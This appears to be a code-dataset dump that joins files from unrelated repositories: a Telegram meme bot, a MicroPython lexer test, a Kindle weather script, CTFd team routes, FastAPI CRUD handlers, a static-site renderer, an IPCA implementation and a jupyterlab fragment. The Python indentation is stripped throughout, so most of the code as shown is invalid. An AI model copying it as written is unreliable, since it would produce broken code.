if isinstance(d, list):
d = {str(i): val for i, val in enumerate(d)}
for (key, val), end in iter_last(d.items()):
if end:
before_item = END_ITEM
else:
before_item = MIDDLE_ITEM
line = default_line
line += f"{before_item}{ITEM}"
if isinstance(val, dict) or isinstance(val, list):
dline = default_line
dline += (NO_ITEM if not end else " ") + " "
val = make_tree(val, title=key, default_line=dline)
line += val
else:
line += f"{key}: {val}"
lines.append(line)
return "\n".join(lines)
```
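A short example of the renderer above; output is shown in the comments (dict insertion order is preserved on Python 3.7+):
```python
# Example of make_tree on a small nested dict.
print(make_tree({"a": 1, "b": {"c": 2, "d": 3}}, title="cfg"))
# cfg
# ├─a: 1
# └─b
#   ├─c: 2
#   └─d: 3
```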
#### File: bot/memes/memes.py
```python
from ..config import bot, dp, _
async def send_meme(message, text):
try:
await message.delete()
except Exception:
pass
try:
await bot.send_message(
message.chat.id, text,
reply_to_message_id=message.reply_to_message.message_id
)
except AttributeError:
await message.answer(text)
memes = {
"bylo": "Было",
"ne_bylo": "Не было",
"rzaka": _("ban.rzaka"),
"rzaka_full": _("ban.rzaka_full"),
"rzaka_time": 848393938347292929647492918363739304964682010
}
@dp.message_handler(commands=["bylo"])
async def bylo(message):
await send_meme(message, memes["bylo"])
@dp.message_handler(commands=["ne_bylo"])
async def ne_bylo(message):
await send_meme(message, memes["ne_bylo"])
@dp.message_handler(commands=["rzaka"])
async def rzaka(message):
await send_meme(message, memes["rzaka"])
@dp.message_handler(commands=["rzaka_full"])
async def rzaka_full(message):
await send_meme(message, memes["rzaka_full"])
@dp.message_handler(commands=["rzaka_time"])
async def rzaka_time(message):
await send_meme(message, memes["rzaka_time"])
@dp.message_handler(commands=["ban"])
async def ban(message):
msg = message.text.split(maxsplit=1)
if len(msg) == 1:
await send_meme(message, "Бан")
else:
await send_meme(message, "Бан " + msg[1])
@dp.message_handler(commands=["fake"])
async def polak(message):
try:
await message.delete()
except Exception:
pass
try:
await bot.send_photo(
message.chat.id, open("media/images/polak.jpg", "rb"),
reply_to_message_id=message.reply_to_message.message_id
)
except AttributeError:
await message.answer_photo(open("media/images/polak.jpg", "rb"))
```
#### File: bot/network/memepedia.py
```python
import pymemeru
from ..config import dp, _
from ..lib import handlers
from ..lib.text import cuteCrop
@dp.message_handler(commands=["memepedia", "meme"])
@handlers.parse_arguments(2)
async def mempep(message, params):
try:
search = await pymemeru.search(params[1])
except AttributeError:
await message.reply(_("errors.not_found"))
return
page = await pymemeru.page(search[0]["name"])
if page[0] == "":
await message.reply(cuteCrop(page[1], 4096), parse_mode="HTML")
else:
await message.reply_photo(page[0],
caption=cuteCrop(page[1], 1000),
parse_mode="HTML")
```
#### File: 0x0bloodyknight/jdan734-bot/bot.py
```python
import asyncio
import aioschedule
from aiogram import executor
from bot import * # noqa
from bot.config import (
dp, polls, DELAY, RSS, VK, SCHEDULE,
KATZ_BOTS, RSS_FEEDS, YOUTUBE, YOUTUBE_CHANNELS)
from bot.timer import rss_task, youtube_task
from bot.vk import vk_timer
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
async def scheduler():
if RSS:
for feed in RSS_FEEDS:
aioschedule.every(DELAY).seconds.do(
rss_task,
feed["url"],
feed["channelid"],
feed["chatid"]
)
if YOUTUBE:
for channel in YOUTUBE_CHANNELS:
aioschedule.every(15).minutes.do(
youtube_task,
channel["channelid"],
channel["chatid"]
)
if VK:
aioschedule.every(DELAY).seconds.do(vk_timer)
if KATZ_BOTS:
aioschedule.every(DELAY).seconds.do(polls.close_old)
while True:
await aioschedule.run_pending()
await asyncio.sleep(5)
async def startup(x):
if SCHEDULE:
asyncio.create_task(scheduler())
executor.start_polling(dp, loop=loop, on_startup=startup)
``` |
{
"source": "0x0ece/micropython",
"score": 4
} |
#### File: tests/basics/lexer.py
```python
print(type(__debug__))
# short input
exec("")
exec("\n")
exec("\n\n")
exec("\r")
exec("\r\r")
print(eval("1"))
print(eval("12"))
print(eval("123"))
print(eval("1\n"))
print(eval("12\n"))
print(eval("123\n"))
print(eval("1\r"))
print(eval("12\r"))
print(eval("123\r"))
# lots of indentation
def a(x):
if x:
if x:
if x:
if x:
if x:
if x:
if x:
if x:
if x:
if x:
if x:
if x:
if x:
if x:
if x:
print(x)
a(1)
``` |
{
"source": "0x0Eddine/kindle4weather",
"score": 3
} |
#### File: 0x0Eddine/kindle4weather/weather_api.py
```python
import datetime
import json
from urllib2 import urlopen
def _fetch_json(url):
json_str = urlopen(url).read()
return json.loads(json_str)
def _parse_forecast(data_json):
"""
return [WeatherData]
"""
tmp_list = []
for data in data_json["forecast"]["simpleforecast"]["forecastday"]:
tmp_list.append(WeatherData(data["icon"], data["high"]["celsius"],
data["low"]["celsius"]))
return tmp_list
class WeatherData(object):
def __init__(self, condition, temp_max, temp_min):
self.condition = condition
self.temp_max = temp_max
self.temp_min = temp_min
class WeatherAPI(object):
_BASE_API_URL = "http://api.wunderground.com/api/"
def __init__(self, api_key, lat, lon):
url_api_key = "appid=%s" % api_key
url_location = "lat=%s&lon=%s" % (lat, lon)
forecast_json = _fetch_json(
"%s/%s/forecast/q/%s,%s.json" %
(WeatherAPI._BASE_API_URL, api_key, lat, lon))
self._data = _parse_forecast(forecast_json)
self._today = datetime.date.today()
def temp_max(self, day):
"""
Input day as integer, 0 means today, 1 means tomorrow, max is 3.
"""
if day > 3:
raise Exception("Invalid day, should less or equal to 3")
return self._data[day].temp_max
def temp_min(self, day):
if day > 3:
raise Exception("Invalid day, should less or equal to 3")
return self._data[day].temp_min
def condition(self, day):
if day > 3:
raise Exception("Invalid day, should less or equal to 3")
return self._data[day].condition
@property
def today(self):
"""
Return a object of datetime.date
"""
return self._today
```
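A usage sketch for the wrapper above; the API key and coordinates are placeholders, and a real Wunderground key would be required:
```python
# Usage sketch; key and coordinates are placeholders, not working values.
api = WeatherAPI("YOUR_API_KEY", "40.71", "-74.00")
for day in range(4):                       # 0 = today .. 3, per the day <= 3 guard
    print(api.condition(day), api.temp_min(day), api.temp_max(day))
print(api.today)                           # datetime.date captured at construction
```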
#### File: 0x0Eddine/kindle4weather/weather_script.py
```python
import codecs
import datetime
import os
import sys
from weather_api import WeatherAPI
from argparse import ArgumentParser
from aqi import aqi_get
CODE_FOLDER = os.path.dirname(os.path.realpath(__file__))
OUTPUT = "/var/www/html/weather/weather.png"
TMP_OUTPUT = "%s/weather.png" % CODE_FOLDER
SVG_PORTRAIT_FILE = "%s/weather-script-preprocess.svg" % CODE_FOLDER
SVG_LANSCAPE_FILE = "%s/weather-script-preprocess-landscape.svg" % CODE_FOLDER
SVG_FILE = SVG_PORTRAIT_FILE
SVG_OUTPUT = "%s/weather-script-output.svg" % CODE_FOLDER
MAX_WEATHER_DAY_COUNT = 3
AQI_CITY = None
def _exec(cmd):
rc = os.system(cmd)
if (rc != 0):
print("`%s` failed with error %d" % (cmd, rc))
exit(rc)
if len(sys.argv) < 4:
print("Need 3 or more argument for API key, latitude, longitud, "
"[is_landscape] [aqi_city_name_for_landscape]")
exit(1)
weather_obj = WeatherAPI(sys.argv[1], sys.argv[2], sys.argv[3])
if len(sys.argv) >= 5 and sys.argv[4] != 0:
SVG_FILE = SVG_LANSCAPE_FILE
if len(sys.argv) >= 6 and sys.argv[5]:
AQI_CITY = sys.argv[5]
# Open SVG to process
output = codecs.open(SVG_FILE, "r", encoding="utf-8").read()
_MAP = {
"$I": WeatherAPI.condition,
"$H": WeatherAPI.temp_max,
"$L": WeatherAPI.temp_min,
}
for x in _MAP.keys():
for i in range(MAX_WEATHER_DAY_COUNT + 1):
output = output.replace("%s%d" % (x, i),
"%s" % _MAP[x](weather_obj, i))
# Replace refresh time
output = output.replace("$TIME",
datetime.datetime.now().strftime("%b %d %a %H:%M"))
# Update AQI. TODO(Gris Ge): still a placeholder.
if AQI_CITY is not None:
output = output.replace("$AQI", str(aqi_get(AQI_CITY)))
day_one = weather_obj.today
# Insert days of week
one_day = datetime.timedelta(days=1)
days_of_week = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]
for i in range(MAX_WEATHER_DAY_COUNT + 1):
output = output.replace("$D%s" % i,
days_of_week[(day_one + i * one_day).weekday()])
# Write output
codecs.open(SVG_OUTPUT, "w", encoding="utf-8").write(output)
_exec("rsvg-convert --background-color=white -o %s %s" %
(TMP_OUTPUT, SVG_OUTPUT))
_exec("pngcrush -c 0 -ow %s 1>/dev/null 2>&1" % TMP_OUTPUT)
#_exec("mv -f '%s' '%s'" % (TMP_OUTPUT, OUTPUT))
``` |
{
"source": "0x0elliot/CTFd",
"score": 2
} |
#### File: CTFd/CTFd/teams.py
```python
from flask import Blueprint, abort, redirect, render_template, request, url_for
from CTFd.cache import clear_team_session, clear_user_session
from CTFd.exceptions import TeamTokenExpiredException, TeamTokenInvalidException
from CTFd.models import TeamFieldEntries, TeamFields, Teams, db
from CTFd.utils import config, get_config, validators
from CTFd.utils.crypto import verify_password
from CTFd.utils.decorators import authed_only, ratelimit, registered_only
from CTFd.utils.decorators.modes import require_team_mode
from CTFd.utils.decorators.visibility import (
check_account_visibility,
check_score_visibility,
)
from CTFd.utils.helpers import get_errors, get_infos
from CTFd.utils.humanize.words import pluralize
from CTFd.utils.user import get_current_user, get_current_user_attrs
teams = Blueprint("teams", __name__)
@teams.route("/teams")
@check_account_visibility
@require_team_mode
def listing():
q = request.args.get("q")
field = request.args.get("field", "name")
filters = []
if field not in ("name", "affiliation", "website"):
field = "name"
if q:
filters.append(getattr(Teams, field).like("%{}%".format(q)))
teams = (
Teams.query.filter_by(hidden=False, banned=False)
.filter(*filters)
.order_by(Teams.id.asc())
.paginate(per_page=50)
)
args = dict(request.args)
args.pop("page", 1)
return render_template(
"teams/teams.html",
teams=teams,
prev_page=url_for(request.endpoint, page=teams.prev_num, **args),
next_page=url_for(request.endpoint, page=teams.next_num, **args),
q=q,
field=field,
)
@teams.route("/teams/invite", methods=["GET", "POST"])
@registered_only
@require_team_mode
def invite():
infos = get_infos()
errors = get_errors()
code = request.args.get("code")
if code is None:
abort(404)
user = get_current_user_attrs()
if user.team_id:
errors.append("You are already in a team. You cannot join another.")
try:
team = Teams.load_invite_code(code)
except TeamTokenExpiredException:
abort(403, description="This invite URL has expired")
except TeamTokenInvalidException:
abort(403, description="This invite URL is invalid")
team_size_limit = get_config("team_size", default=0)
if request.method == "GET":
if team_size_limit:
infos.append(
"Teams are limited to {limit} member{plural}".format(
limit=team_size_limit, plural=pluralize(number=team_size_limit)
)
)
return render_template(
"teams/invite.html", team=team, infos=infos, errors=errors
)
if request.method == "POST":
if errors:
return (
render_template(
"teams/invite.html", team=team, infos=infos, errors=errors
),
403,
)
if team_size_limit and len(team.members) >= team_size_limit:
errors.append(
"{name} has already reached the team size limit of {limit}".format(
name=team.name, limit=team_size_limit
)
)
return (
render_template(
"teams/invite.html", team=team, infos=infos, errors=errors
),
403,
)
user = get_current_user()
user.team_id = team.id
db.session.commit()
clear_user_session(user_id=user.id)
clear_team_session(team_id=team.id)
return redirect(url_for("challenges.listing"))
@teams.route("/teams/join", methods=["GET", "POST"])
@authed_only
@require_team_mode
@ratelimit(method="POST", limit=10, interval=5)
def join():
infos = get_infos()
errors = get_errors()
user = get_current_user_attrs()
if user.team_id:
errors.append("You are already in a team. You cannot join another.")
if request.method == "GET":
team_size_limit = get_config("team_size", default=0)
if team_size_limit:
plural = "" if team_size_limit == 1 else "s"
infos.append(
"Teams are limited to {limit} member{plural}".format(
limit=team_size_limit, plural=plural
)
)
return render_template("teams/join_team.html", infos=infos, errors=errors)
if request.method == "POST":
teamname = request.form.get("name")
passphrase = request.form.get("password", "").strip()
team = Teams.query.filter_by(name=teamname).first()
if errors:
return (
render_template("teams/join_team.html", infos=infos, errors=errors),
403,
)
if team and verify_password(passphrase, team.password):
team_size_limit = get_config("team_size", default=0)
if team_size_limit and len(team.members) >= team_size_limit:
errors.append(
"{name} has already reached the team size limit of {limit}".format(
name=team.name, limit=team_size_limit
)
)
return render_template(
"teams/join_team.html", infos=infos, errors=errors
)
user = get_current_user()
user.team_id = team.id
db.session.commit()
if len(team.members) == 1:
team.captain_id = user.id
db.session.commit()
clear_user_session(user_id=user.id)
clear_team_session(team_id=team.id)
return redirect(url_for("challenges.listing"))
else:
errors.append("That information is incorrect")
return render_template("teams/join_team.html", infos=infos, errors=errors)
@teams.route("/teams/new", methods=["GET", "POST"])
@authed_only
@require_team_mode
def new():
infos = get_infos()
errors = get_errors()
if bool(get_config("team_creation", default=True)) is False:
abort(
403,
description="Team creation is currently disabled. Please join an existing team.",
)
num_teams_limit = int(get_config("num_teams", default=0))
num_teams = Teams.query.filter_by(banned=False, hidden=False).count()
if num_teams_limit and num_teams >= num_teams_limit:
abort(
403,
description=f"Reached the maximum number of teams ({num_teams_limit}). Please join an existing team.",
)
user = get_current_user_attrs()
if user.team_id:
errors.append("You are already in a team. You cannot join another.")
if request.method == "GET":
team_size_limit = get_config("team_size", default=0)
if team_size_limit:
plural = "" if team_size_limit == 1 else "s"
infos.append(
"Teams are limited to {limit} member{plural}".format(
limit=team_size_limit, plural=plural
)
)
return render_template("teams/new_team.html", infos=infos, errors=errors)
elif request.method == "POST":
teamname = request.form.get("name", "").strip()
passphrase = request.form.get("password", "").strip()
website = request.form.get("website")
affiliation = request.form.get("affiliation")
user = get_current_user()
existing_team = Teams.query.filter_by(name=teamname).first()
if existing_team:
errors.append("That team name is already taken")
if not teamname:
errors.append("That team name is invalid")
# Process additional user fields
fields = {}
for field in TeamFields.query.all():
fields[field.id] = field
entries = {}
for field_id, field in fields.items():
value = request.form.get(f"fields[{field_id}]", "").strip()
if field.required is True and (value is None or value == ""):
errors.append("Please provide all required fields")
break
# Handle special casing of existing profile fields
if field.name.lower() == "affiliation":
affiliation = value
break
elif field.name.lower() == "website":
website = value
break
if field.field_type == "boolean":
entries[field_id] = bool(value)
else:
entries[field_id] = value
if website:
valid_website = validators.validate_url(website)
else:
valid_website = True
if affiliation:
valid_affiliation = len(affiliation) < 128
else:
valid_affiliation = True
if valid_website is False:
errors.append("Websites must be a proper URL starting with http or https")
if valid_affiliation is False:
errors.append("Please provide a shorter affiliation")
if errors:
return render_template("teams/new_team.html", errors=errors), 403
        team = Teams(name=teamname, password=passphrase, captain_id=user.id)
if website:
team.website = website
if affiliation:
team.affiliation = affiliation
db.session.add(team)
db.session.commit()
for field_id, value in entries.items():
entry = TeamFieldEntries(field_id=field_id, value=value, team_id=team.id)
db.session.add(entry)
db.session.commit()
user.team_id = team.id
db.session.commit()
clear_user_session(user_id=user.id)
clear_team_session(team_id=team.id)
return redirect(url_for("challenges.listing"))
@teams.route("/team")
@authed_only
@require_team_mode
def private():
infos = get_infos()
errors = get_errors()
user = get_current_user()
if not user.team_id:
return render_template("teams/team_enrollment.html")
team_id = user.team_id
team = Teams.query.filter_by(id=team_id).first_or_404()
solves = team.get_solves()
awards = team.get_awards()
place = team.place
score = team.score
if config.is_scoreboard_frozen():
infos.append("Scoreboard has been frozen")
class teams_template_info():
def __init__(self, solves, awards, user, team, score, place, infos, errors):
self.solves = solves
self.awards = awards
self.user = user
self.team = team
self.score = score
self.place = place
self.score_frozen = config.is_scoreboard_frozen()
self.infos = infos
self.errors = errors
information = teams_template_info(solves, awards, user, team, score, place, infos, errors)
    return render_template(
        "teams/private.html",
        information=information,
    )
@teams.route("/teams/<int:team_id>")
@check_account_visibility
@check_score_visibility
@require_team_mode
def public(team_id):
infos = get_infos()
errors = get_errors()
team = Teams.query.filter_by(id=team_id, banned=False, hidden=False).first_or_404()
solves = team.get_solves()
awards = team.get_awards()
place = team.place
score = team.score
if errors:
return render_template("teams/public.html", team=team, errors=errors)
if config.is_scoreboard_frozen():
infos.append("Scoreboard has been frozen")
return render_template(
"teams/public.html",
solves=solves,
awards=awards,
team=team,
score=score,
place=place,
score_frozen=config.is_scoreboard_frozen(),
infos=infos,
errors=errors,
)
``` |
{
"source": "0x0elliot/prep-project-4.1.2",
"score": 3
} |
#### File: server/db/crud.py
```python
from sqlalchemy.orm import Session
from sqlalchemy.sql.expression import desc
from . import models
import schemas
from db.database import SessionLocal
# Dependency
def get_db():
db = SessionLocal()
try:
yield db
finally:
db.close()
def get_user(db: Session, user_id: int):
return db.query(models.User).filter(models.User.id == user_id).first()
def get_user_by_email(db: Session, email: str):
return db.query(models.User).filter(models.User.email == email).first()
def get_users(db: Session, skip: int = 0, limit: int = 100):
return db.query(models.User).offset(skip).limit(limit).all()
def create_user(db: Session, user: schemas.User):
db_user = models.User(email=user.email, name=user.name)
db.add(db_user)
db.commit()
db.refresh(db_user)
return db_user
def test_populate_db(db: Session, user: schemas.User):
create_user(db, user)
def get_place_by_id(db: Session, place_id: int):
return db.query(models.Place).filter(models.Place.id == place_id).first()
def get_places_by_tag(db: Session, tag_name: str):
ans = db.query(models.Place).join(models.Place.tags).filter(
models.Tag.name == tag_name).order_by(desc(models.Place.vote_count)).limit(10).all()
return ans
def create_vote(db: Session, user: models.User, place: models.Place):
vote = models.Vote()
vote.user = user
place.votes.append(vote)
place.vote_count += 1
db.add(vote)
db.commit()
db.refresh(vote)
return vote
def create_comment(db: Session, user: models.User, place: models.Place, body: str):
comment = models.Comment(body=body)
comment.user = user
place.comments.append(comment)
db.add(comment)
db.commit()
db.refresh(comment)
return comment
def create_webhook(db: Session, user: models.User, webhook: schemas.WebhookCreate):
db_webhook = models.Webhook(trigger_name=webhook.trigger_name,
url=webhook.url,
type=webhook.type,
place='POINT({x} {y})'.format(x=webhook.locationX, y=webhook.locationY))
db_webhook.user = user
user.webhooks.append(db_webhook)
db.add(db_webhook)
db.commit()
db.refresh(db_webhook)
return db_webhook
def get_webhooks(user: models.User):
return user.webhooks
```
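A minimal usage sketch for the CRUD helpers above, wired into a FastAPI route in the style of the router file that follows. The route path is hypothetical; `verify.get_current_user` is the auth dependency this project uses elsewhere:
```python
from fastapi import APIRouter, Depends, HTTPException
from sqlalchemy.orm import Session

from db import crud, models
from db.crud import get_db
from verify import get_current_user

router = APIRouter()

@router.post("/places/{place_id}/votes")
async def vote(place_id: int, db: Session = Depends(get_db),
               user: models.User = Depends(get_current_user)):
    # 404 early so we never create a vote for a missing place
    place = crud.get_place_by_id(db, place_id)
    if place is None:
        raise HTTPException(status_code=404, detail="Place invalid")
    return crud.create_vote(db, user, place)
```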
#### File: server/routers/comments.py
```python
from fastapi import APIRouter, Depends, HTTPException
from db.crud import get_db
import schemas
from sqlalchemy.orm import Session
from db import crud, models
from verify import get_current_user
router = APIRouter()
@router.post('/', response_model=schemas.Comment)
async def post_comment(comment: schemas.CommentBase, db: Session = Depends(get_db), user: models.User = Depends(get_current_user)):
place = crud.get_place_by_id(db, comment.place_id)
if place is None:
raise HTTPException(status_code=404, detail="Place invalid")
return crud.create_comment(db, user, place, comment.body)
``` |
{
"source": "0x0ffff/Maverick",
"score": 2
} |
#### File: Maverick/Maverick/Renderer.py
```python
import os
from jinja2 import Environment, PackageLoader
import moment
import re
import json
from feedgen.feed import FeedGenerator
from .Router import Router
from .Utils import safe_write, unify_joinpath, tr
from .Markdown import Markdown
class Renderer:
def __init__(self, config):
self._config = config
template = ".".join(["Templates", self._config.template])
self._env = Environment(loader=PackageLoader(template))
self._env.globals['moment'] = moment
self._env.globals['config'] = self._config
self._env.globals['Router'] = Router(self._config)
self._env.globals['tr'] = tr
from importlib import import_module
self._theme = import_module(template)
        for k, v in self._theme.theme_globals.items():
self._env.globals[k] = v
@staticmethod
def markdown(content):
return Markdown(content)
@staticmethod
def excerpt(content):
def strip(text):
r = re.compile(r'<[^>]+>', re.S)
return r.sub('', text)
excerpt = content.get_meta("excerpt")
if excerpt != "":
return excerpt
# find <!--more-->
index = content.parsed.find('<!--more-->')
if index != -1:
excerpt = strip(content.parsed[:index])
else:
excerpt = strip(content.parsed)
            # split() keeps the whole string when there is no newline, unlike
            # slicing with find(), which returns -1 and drops the last char
            excerpt = excerpt.split('\n', 1)[0]
return excerpt
def update_env(self, env: dict):
for k, v in env.items():
self._env.globals[k] = v
def render_post(self, content, prev=None, next=None):
template = self._env.get_template("post.html")
return template.render(
content=content,
content_prev=prev,
content_next=next
)
def render_page(self, content, prev=None, next=None):
template = self._env.get_template("page.html")
return template.render(
content=content,
content_prev=prev,
content_next=next
)
def render_index(self, content_list, current_page, max_pages):
template = self._env.get_template("index.html")
return template.render(
content_list=content_list,
current_page=current_page,
max_pages=max_pages)
def render_tags(self, content_list, current_page, max_pages, tag_name=""):
template = self._env.get_template("tags.html")
return template.render(
tag_name=tag_name,
content_list=content_list,
current_page=current_page,
max_pages=max_pages)
def render_categories(self, content_list, current_page, max_pages, cate_name=""):
template = self._env.get_template("categories.html")
return template.render(
cate_name=cate_name,
content_list=content_list,
current_page=current_page,
max_pages=max_pages)
def render_archives(self, content_list, current_page, max_pages):
template = self._env.get_template("archives.html")
return template.render(
content_list=content_list,
current_page=current_page,
max_pages=max_pages)
def render_sitemap(self, page_list, post_list):
template = self._env.get_template("sitemap.xml")
sitemap = template.render(page_list=page_list,
post_list=post_list)
safe_write(
unify_joinpath(self._config.build_dir, 'sitemap.xml'), sitemap)
def render_rss(self, post_list):
router = Router(self._config)
fg = FeedGenerator()
fg.id(self._config.site_prefix)
fg.title(self._config.site_name)
fg.author({
'name': self._config.author,
'email': self._config.email
})
fg.link(href=self._config.site_prefix, rel='alternate')
fg.logo(self._config.site_logo)
fg.subtitle(self._config.description)
fg.language(self._config.language)
fg.lastBuildDate(moment.now().locale(self._config.locale).date)
fg.pubDate(moment.now().locale(self._config.locale).date)
for post in post_list[:10]:
meta = post.meta
fe = fg.add_entry()
fe.title(meta['title'])
fe.link(href=router.gen_permalink_by_meta(meta))
fe.guid(router.gen_permalink_by_meta(meta), True)
fe.pubDate(meta['date'].date)
fe.author({
'name': meta['author'],
'uri': self._config.author_homepage,
'email': self._config.email
})
fe.content(post.parsed)
if not os.path.exists(unify_joinpath(self._config.build_dir, 'feed/atom')):
os.makedirs(unify_joinpath(self._config.build_dir, 'feed/atom'))
fg.rss_file(unify_joinpath(self._config.build_dir, 'feed/index.xml'))
fg.rss_file(unify_joinpath(self._config.build_dir, 'feed/index.html'))
fg.atom_file(unify_joinpath(
self._config.build_dir, 'feed/atom/index.xml'))
fg.atom_file(unify_joinpath(
self._config.build_dir, 'feed/atom/index.html'))
def render_search_cache(self, post_list, page_list):
router = Router(self._config)
def strip(text):
r = re.compile(r'<[^>]+>', re.S)
return r.sub('', text)
def gen_entry(content):
entry = {
"title": content.get_meta('title'),
"date": str(content.get_meta('date')),
"path": router.gen_permalink_by_content(content),
"text": strip(content.parsed),
"categories": [],
"tags": []
}
if (content.get_meta('layout') == 'post'):
for cate in content.get_meta('categories'):
entry['categories'].append({
"name": cate,
"slug": cate,
"permalink": router.gen_permalink('category', cate, 1)
})
for tag in content.get_meta('tags'):
entry['tags'].append({
"name": tag,
"slug": tag,
"permalink": router.gen_permalink('tag', tag, 1)
})
return entry
posts = [gen_entry(post) for post in post_list if not post.skip]
pages = [gen_entry(page) for page in page_list if not page.skip]
cache = json.dumps({
"posts": posts,
"pages": pages
})
return cache
``` |
{
"source": "0x0is1/cardet",
"score": 3
} |
#### File: 0x0is1/cardet/main.py
```python
from libcardet import libcardet as lcd
def main():
vehicle_num = input(f"{lcd.tmcolors.OKCYAN}[*] Enter vehicle number to get details: {lcd.tmcolors.ENDC}")
data = lcd.get_details(vehicle_num)
for i in list(data):
print(f"{lcd.tmcolors.OKGREEN}[+] {i}: {data[i]}{lcd.tmcolors.ENDC}")
if __name__ == '__main__':
main()
``` |
{
"source": "0x0L/fastipca",
"score": 2
} |
#### File: src/fastipca/fastipca.py
```python
import logging
import numpy as np
import opt_einsum as oe
import pandas as pd
from scipy.sparse.linalg import svds
logging.basicConfig(
format="%(levelname)s: %(name)s - %(asctime)s.%(msecs)03d %(message)s",
datefmt="%H:%M:%S",
level=logging.INFO,
)
_logger = logging.getLogger(__name__)
def train(
Z,
R,
n_factors=1,
exog_factors=None,
intercept=False,
max_iter=1000,
tol=1e-6,
verbose=False,
):
"""Implements the IPCA algorithm by <NAME> (2017).
Parameters
----------
Z : pandas.DataFrame
Panel of characteristics. Columns are individual characteristics.
Index must be a multi-index with time as the first component
and symbols as the second component.
The time component must be sorted.
R : pandas.Series
        Panel of returns to be explained. Index must agree with Z's index.
n_factors : integer
        Number of factors to calibrate; may be 0.
exog_factors : pandas.DataFrame
Matrix of pre-specified factors. Index must coincide with the first
        level of Z's index.
intercept: bool
If true, a constant pre-specified factor equals to one is appended.
max_iter: integer
Maximum number of iterations to perform.
tol : float
MAE tolerance between iterations.
verbose : bool
If True, displays convergence info each iteration.
Returns
-------
gamma : pandas.DataFrame
Characteristics loadings.
factors : pandas.DataFrame
Factor estimates.
Note
----
The factor must be positive.
"""
if verbose:
_logger.setLevel(logging.INFO)
else:
_logger.setLevel(logging.WARN)
assert n_factors >= 0
assert max_iter >= 0
assert Z.index.equals(R.index)
assert Z.index.get_level_values(0).is_monotonic_increasing
_logger.info("compute interactions and covariances")
ix = Z.index.remove_unused_levels()
r = 1 + np.nonzero(np.diff(ix.codes[0]))[0]
r = np.array([0, *r.tolist(), ix.shape[0]])
nobs = r[1:] - r[:-1]
z = Z.values
zr = z * R.values[:, None]
Q = np.stack([zr[i:j].mean(0) for i, j in zip(r, r[1:])])
W = np.stack([z[i:j].T @ z[i:j] / (j - i) for i, j in zip(r, r[1:])])
_logger.info("initialize gamma, factors")
if exog_factors is None:
exog_factors_names = []
exog_factors = np.empty((ix.levels[0].shape[0], 0))
else:
assert exog_factors.index.equals(ix.levels[0])
exog_factors_names = exog_factors.columns.tolist()
exog_factors = exog_factors.values
factor_names = list(range(n_factors)) + exog_factors_names
if intercept:
factor_names.append("intercept")
n_all = len(factor_names)
active = slice(0, n_factors)
specified = slice(n_factors, n_all)
gamma = np.zeros((Z.shape[1], n_all))
factors = np.zeros((exog_factors.shape[0], n_all))
f_on, f_off = factors[:, active], factors[:, specified]
g_on, g_off = gamma[:, active], gamma[:, specified]
if intercept:
f_off[:, :-1] = exog_factors
f_off[:, -1] = 1.0
else:
f_off[:] = exog_factors
if n_factors > 0:
if n_factors == Z.shape[1]:
f, s, g = np.linalg.svd(Q, full_matrices=False)
else:
f, s, g = svds(Q, k=n_factors)
o = np.argsort(s)[::-1]
g_on[:] = g[o].T
f_on[:] = f[:, o] * s[o]
for ite in range(max_iter):
factors_old, gamma_old = f_on.copy(), gamma.copy()
# factors step
if n_factors > 0:
m1 = oe.contract("lk,tlm,mn->tkn", g_on, W, g_on)
m2 = Q @ g_on
if n_factors != n_all:
m2 -= oe.contract("lk,tlm,mn,tn->tk", g_on, W, g_off, f_off)
f_on[:] = np.linalg.solve(m1, m2)
# gamma step
numer = oe.contract("tl,tf,t->lf", Q, factors, nobs).reshape(-1)
denom = oe.contract("tij,tk,tl,t->ikjl", W, factors, factors, nobs)
denom = denom.reshape((gamma.size, gamma.size))
gamma[:] = np.linalg.solve(denom, numer).reshape(gamma.shape)
# identification
if n_factors > 0:
# make gamma and factors orthogonal
R1 = np.linalg.cholesky(g_on.T @ g_on)
R2, _, _ = np.linalg.svd(R1 @ f_on.T @ f_on @ R1.T)
f_on[:] = np.linalg.solve(R2, R1 @ f_on.T).T
g_on[:] = np.linalg.lstsq(g_on.T, R1.T, rcond=None)[0] @ R2
# make g_off and g_on orthogonal
if n_factors != n_all:
g_off[:] -= g_on @ g_on.T @ g_off
f_on[:] += f_off @ g_off.T @ g_on
# factors should have a positive mean
sgn = np.sign(f_on.mean(0))
sgn[sgn == 0] = 1
f_on[:] *= sgn
g_on[:] *= sgn
# exit condition
tol_f, tol_g = -np.inf, -np.inf
if n_all > 0:
tol_g = np.abs(gamma - gamma_old).max()
if n_factors > 0:
tol_f = np.abs(f_on - factors_old).max()
_logger.info(f"iter={ite} tol_g={tol_g:.4} tol_f={tol_f:.4}")
if max(tol_g, tol_f) < tol:
break
else:
_logger.warning("ipca did not converge")
gamma = pd.DataFrame(gamma, index=Z.columns, columns=factor_names)
factors = pd.DataFrame(factors, index=ix.levels[0], columns=factor_names)
return gamma, factors
def predict(Z, gamma, factors):
"""Implements the IPCA algorithm by <NAME> (2017).
Parameters
----------
Z : pandas.DataFrame
Panel of characteristics. Columns are individual characteristics.
Index must be a multi-index with time as the first component
and symbols as the second component.
The time component must be sorted.
gamma : pandas.DataFrame
Characteristics loadings.
factors : pandas.DataFrame
Factor estimates.
Returns
-------
pandas.Series
Reconstructed values.
"""
rhat = Z.values @ gamma.values
if factors.ndim == 1:
rhat *= factors.values
else:
assert Z.index.levels[0].equals(factors.index)
rhat *= factors.values[Z.index.codes[0]]
rhat = rhat.sum(1)
return pd.Series(rhat, index=Z.index)
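# Illustrative usage sketch (toy data; every name below is hypothetical, not
# part of the library):
#
#   periods = pd.date_range("2020-01-31", periods=24, freq="M")
#   index = pd.MultiIndex.from_product([periods, ["AAA", "BBB", "CCC"]])
#   Z = pd.DataFrame(np.random.randn(len(index), 4), index=index)
#   R = pd.Series(np.random.randn(len(index)), index=index)
#   gamma, factors = train(Z, R, n_factors=2)
#   rhat = predict(Z, gamma, factors)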
``` |
{
"source": "0x0L/jupyterlab",
"score": 2
} |
#### File: jupyterlab/jupyterlab/labextensions.py
```python
from __future__ import print_function
import os
import shutil
import sys
import tarfile
from os.path import join as pjoin, normpath
from jupyter_core.paths import (
jupyter_data_dir, jupyter_config_dir, jupyter_config_path,
SYSTEM_JUPYTER_PATH, ENV_JUPYTER_PATH, ENV_CONFIG_PATH, SYSTEM_CONFIG_PATH
)
from ipython_genutils.path import ensure_dir_exists
from ipython_genutils.py3compat import string_types, cast_unicode_py2
from . import __version__
from traitlets.config.manager import BaseJSONConfigManager
from traitlets.utils.importstring import import_item
